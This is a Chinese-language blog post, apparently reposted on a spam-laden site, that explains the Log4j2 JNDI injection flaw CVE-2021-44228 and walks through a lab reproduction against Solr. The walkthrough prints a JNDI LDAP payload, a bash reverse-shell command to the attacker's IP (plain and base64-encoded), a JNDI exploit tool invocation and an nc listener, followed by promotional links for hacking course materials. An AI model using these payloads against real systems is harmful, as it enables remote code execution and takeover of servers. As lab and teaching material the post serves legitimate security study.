当前位置: 首页 > news >正文

西安北郊做网站深圳网络营销推广服务

西安北郊做网站,深圳网络营销推广服务,聊城高端网站建设报价,东莞路桥总公司电话一、简介 Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。 它是 Log4j 的升级版本#xff0c;相比于 Log4j#xff0c;Log4j2 在性能、可靠性和灵活性方面都有显著的改进。 二、特点 Log4j2 是一个功能强大且灵活的日志记录框架#xff0c;旨在提供高…一、简介 Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。 它是 Log4j 的升级版本相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。 二、特点 Log4j2 是一个功能强大且灵活的日志记录框架旨在提供高性能的日志记录解决方案。它被广泛用于各种 Java 应用程序和框架中帮助开发人员更好地管理和分析应用程序的日志信息。 三、CVE-2021-44228 漏洞简介 log4j支持JNDI协议。 Apache Log4j2是一个基于Java的日志记录工具当前被广泛应用于业务系统开发开发者可以利用该工具将程序的输入输出信息进行日志记录。 漏洞原理 攻击者构造payload在JNDI接口lookup查询进行注入payload为${jndi:ldap:恶意url/poc}JNDI会去对应的服务如LDAP、RMI、DNS、文件系统、目录服务…本例为ldap查找资源由于lookup的出栈没做限制最终指向了攻击者部署好的恶意站点下载了远程的恶意class最终造成了远程代码执行rce。 log4j2框架下的lookup查询服务提供了{}字段解析功能传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制就有可能让查询指向任何服务可能是攻击者部署好的恶意代码。 攻击者可以利用这一点进行JNDI注入使得受害者请求远程服务来链接本地对象在lookup的{}里面构造payload调用JNDI服务LDAP向攻击者提前部署好的恶意站点获取恶意的.class对象造成了远程代码执行可反弹shell到指定服务器。 log4j是一款通用日志记录工具开发人员可以使用log4j对当前程序状态进行记录。log4j的功能非常强大开发人员除了直接记录文本外还可以使用简单表达式记录动态内容例如 logger.info(system propety: ${sys:user.dir}); lookup功能 Lookup 是一种查找机制用于动态获取和替换日志记录中的变量或属性的值。它提供了一种灵活的方式可以在日志消息中引用、解析和插入各种上下文相关的信息。 log4j中除了sys解析器外还有很多其他类型的解析器。其中jndi 解析器就是本次漏洞的源头。 JNDI解析器 JND全称为Java命名和目录接口提供了命名服务和目录服务允许从指定的远程服务器获取并加载对象JNDI注入攻击时常用的就是通过RMI和LDAP两种服务。 正常的包含jndi的日志记录方式如下 logger.info(system propety: ${jndi:schema://url}); log4j2框架下的lookup查询服务提供了{}字段解析功能传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制就有可能让查询指向任何服务可能是攻击者部署好的恶意代码。 jdk将从url指定的路径下载一段字节流并将其反序列化为Java对象作为jndi返回。反序列化过程中即会执行字节流中包含的程序。 攻击者如何控制服务器上记录的日志内容呢 大部分web服务程序都会对用户输入进行日志记录。例如用户访问了哪些url有哪些关键的输入等都会被作为参数送到log4j中我们在这些地方写上 ${jndi:ldap://xxx.dnslog.cn}就可以使web服务从xxx.dnslog.cn下载字节流了。 ldap服务 LDAP(轻型目录访问协议)是一个开放的中立的工业标准的应用协议 通过IP协议提供访问 控制和维护分布式信息的目录信息。 目录是一个为查询、浏览和搜索而优化的专业分布式数据库它呈 树状结构组织数据就好象Linux/Unix系统中的文件目录一样。 RMI RMI远程方法调用它是一种机制能够让在某个java虚拟机上的对象调用另一个Java虚拟机 的对象的方法。 三、攻击过程 log4j2 远程代码执行漏洞大致过程此处使用RMILDAP同理 假设有一个Java程序将用户名信息到了日志中如下 a.攻击者发送一个HTTP请求其用户名为${jndi://rmi:服务器地址/Exploit} b.被攻击服务器发现要输出的信息中有 ${}则其中的内容要单独处理进一步解析是JNDI扩展内容且使用的是RMI而后根据RMI服务器地址去请求Exploit。 c.RMI服务器返回Reference对象用于告诉请求端所请求对象所在的类而该Reference指定了远端 文件下载服务器上含有恶意代码的class文件。 d.被攻击服务器通过Reference对象去请求文件下载服务器上的class文件。 e.被攻击服务器下载恶意class文件并执行其中的恶意代码。 LDAP 当用户输入信息时应用程序中的log4j2组件会将信息记录到日志中 a.假如日志中含有该语句${jndi:ldap:192.168.96.1:1099/exp} b.被攻击服务器发现要输出的信息中有 ${}log4j就会去解析该信息通过jndi的lookup()方法去解析该URLldap:192.168.96.1:1099/exp c.解析到ldap就会去192.168.61.129:1099的ldap服务找名为exp的资源如果找不到就会去http服务中找在http中找到exp之后就会将资源信息返回给应用程序的log4j组件而log4j组件就会下载下来然后发现exp是一个.class文件就会去执行里面的代码从而实现注入攻击者就可以通过shell实现任意的命令执行造成严重危害 四、漏洞复现 编号CVE-2021-44228 kali充当靶机IP地址为192.168.200.14 win11充当攻击机IP地址为192.168.200.22 1、漏洞环境 在kali中进入靶场环境 cd /vulhub-master/log4j/CVE-2021-44228 启动环境 docker-compose up -d 2、访问靶机 http://your-ip:8983 3、登录网站dns回显网站 CEYE - Monitor service for security testing 根据身份标识符构造payload查看cecy是否返回数据。 4、dns回显验证 /solr/admin/cores?action${jndi:ldap://xxxxxxxx.io} #ladp是协议后的地址dns地址 查看cecy是否返回数据 5、将bash反弹shell命令编码备用 bash -i /dev/tcp/192.168.200.22/8899 01 注意 bash: 启动一个 Bash shell。-i: 打开一个交互式 shell 会话允许用户输入命令和获取输出。 /dev/tcp/192.168.192.180/5555: 将标准输出和标准错误输出重定向到指定的 IP 地址为 192.168.191.180、端口号为 5555 ’ TCP 连接。换句话说它将尝试建立一个与该 IP 地址和端口号连接的网络套接字并将输出发送到该连接。01: 将标准输入文件描述符 0重定向到标准输出文件描述符 1意味着输入和输出都将通过网络套接字进行传输。 经过base64编码: YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4yMi84ODk5IDAJjE 6、使用JNDIExploit进行漏洞利用 将上面base64编码后的bash命令填入指定位置 格式java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,Base64编码后的Payload} | {base64,-d} | {bash,-i} -A 攻击机IPjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4yMi84ODk5IDAJjE|{bash,-i} -A 192.168.200.22 将下载好的EXP放 置到攻击机中在当前目录下执行编码后的bash命令 将构造的 5.在攻击机中开启监听 nc -lvvp 8899 6.使用payload的进行攻击根据自己攻击机的JDK版本选择 http://192.168.200.14:8983/solr/admin/cores?action${jndi:ldap://192.168.200.22:1389/aybhrq} 回到终端查看回显请求 另一边的监听终端获得root权限 漏洞修复 更新log4j至 rc2配置防火墙策略禁止主动连接外网设备升级受影响的应用及组件过滤相关的关键词比如${jndi://*}限制JNDI默认可以使用的协议限制可以通过LDAP访问的服务器和类 五、网络安全学习路线 为了帮助大家更好的学习网络安全我给大家准备了一份网络安全入门/进阶学习资料里面的内容都是适合零基础小白的笔记和资料不懂编程也能听懂、看懂所有资料共282G朋友们如果有需要全套网络安全入门进阶学习资源包可以点击免费领取如遇扫码问题可以在评论区留言领取哦~ 《网络安全入门进阶学习资源包》CSDN大礼包《黑客网络安全入门进阶学习资源包》免费分享 网安嘿客红蓝对抗所有方向的学习路线 对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。 ​​​​ 学习资料工具包 压箱底的好资料全面地介绍网络安全的基础理论包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等将基础理论和主流工具的应用实践紧密结合有利于读者理解各种主流工具背后的实现机制。 ​​​​ 网络安全源码合集工具包 ​​ 视频教程 ​​ 面试题资料 独家渠道收集京东、360、天融信等公司测试题进大厂指日可待 ​​​ 全部资料共282G朋友们如果有需要全套网络安全入门进阶学习资源包可以点击免费领取如遇扫码问题可以在评论区留言领取哦~ 黑客/网安大礼包CSDN大礼包《黑客网络安全入门进阶学习资源包》免费分享 对于每一个从事网络安全的人来说庞大的网络都如宇宙般浩瀚无垠而作为这个联通世界的巨网的保卫者我们当心存敬畏。
http://www.hkea.cn/news/14509196/

相关文章:

  • 厦门市建设局官方网站证书查询网站 攻击
  • 企业门户网站需求分析wordpress卡核销
  • 网站被攻击的方法企业宣传手册封面模板
  • 福州网站模板建站运河网站制作
  • 正规的佛山网站建设价格天眼查公司注册信息
  • 网站建设的500字小结平台优化
  • 麻涌企业网站建设pc网站转wap网站
  • 深圳网站设计比较好的公司有哪些手机网站制作器
  • 新手入门网站建设做网站会什么软件
  • 企业网站设计服务公司温州网站建设 温州网站制作
  • 网站建设投标书模板网站开发的安全策略
  • 做自媒体小视屏哪个网站好毕设做网站怎么命题
  • 网站定制开发建设网络网站设计培训
  • 网站建设的平台软件开发公司服务
  • 查 网站接入服务提供者名称网站建设方案书 下载
  • 心理教育网站建设目的建设个人网站刷
  • 泰国男女做那个视频网站石家庄seo公司
  • 高中男女做那个视频网站律师怎么做网站
  • 旅游网站开发目的和目标网页微博怎么用qq登录
  • 外贸seo网站建站兵团建设环保局网站
  • 特级a做爰网站竞价托管外包公司
  • 中小型企业网站建设与推广深圳黄页信息网
  • 中国建行官方网站哈尔滨大型网站建设
  • 不同类型的购物网站wordpress用什么采集
  • 济南企业建站排行榜企业查询天眼查官网
  • phpcms 后台修改修改网站备案号手机网站制作天强科技
  • 做竞拍网站合法吗网站客户续费
  • 用代码做网站惠东seo公司
  • 菏泽兼职网站建设建设网站工作室
  • 温岭市溪建设局网站济阳网站建设哪家好